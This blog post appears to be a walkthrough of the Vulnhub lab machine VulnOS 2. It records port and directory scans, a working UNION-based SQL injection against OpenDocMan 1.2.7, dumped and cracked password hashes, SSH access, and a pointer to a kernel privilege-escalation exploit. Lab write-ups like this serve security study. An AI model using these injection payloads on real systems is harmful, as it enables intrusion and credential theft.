Tuesday, October 15, 2019

Vulnhub: VulnOS: 2

source: https://www.vulnhub.com/entry/vulnos-2,147/

192.168.1.106

22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open  irc     ngircd

maybe ubuntu 14.04

ngircd-21 (i686/pc/linux-gnu)

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)

http://192.168.1.106/jabc
/includes (Status: 301)
/misc (Status: 301)
/modules (Status: 301)
/profiles (Status: 301)
/robots.txt (Status: 200)
/scripts (Status: 301)
/sites (Status: 301)
/templates (Status: 301)
/themes (Status: 301)
/index.php (Status: 200)
/xmlrpc.php (Status: 200)

http://192.168.1.106/jabc/profiles/standard/standard.info
version = “7.26”

http://192.168.1.106/jabc/?q=node/7
For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest

http://192.168.1.106/jabcd0cs
username guest, password guest

OpenDocMan v1.2.7

https://www.exploit-db.com/exploits/32075
OpenDocMan 1.2.7 - Multiple Vulnerabilities

http://192.168.1.106/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,schema_name,3,4,5,6,7,8,9%20from%20information_schema.schemata

SELECT 1,schema_name,3,4,5,6,7,8,9 FROM information_schema.schemata
drupal7
jabcd0cs

SELECT 1,concat(table_schema,0x3a,table_name),3,4,5,6,7,8,9 FROM information_schema.tables
drupal7:users
jabcd0cs:odm_user
mysql:user

SELECT 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 FROM information_schema.columns
drupal7:users:name
drupal7:users:pass
jabcd0cs:odm_user:username
jabcd0cs:odm_user:password
mysql:user:User
mysql:user:Password

SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9 FROM jabcd0cs.odm_user
webmin:b78aae356709f8c31118ea613980954b -> webmin1980

SELECT 1,concat(name,0x3a,pass),3,4,5,6,7,8,9 FROM drupal7.users
webmin:$S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug

SELECT 1,concat(User,0x3a,Password),3,4,5,6,7,8,9 FROM mysql.user
root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
debian-sys-maint:*6BC5901B87B5DF07E1C2BA75C15C537EB6B4078B
phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
drupal7:*9CFBBC772F3F6C106020035386DA5BBBF1249A11

ssh username webmin, password webmin1980

Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
PRETTY_NAME="Ubuntu 14.04.4 LTS"

/etc/passwd
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash

https://www.exploit-db.com/exploits/37292
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation


Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)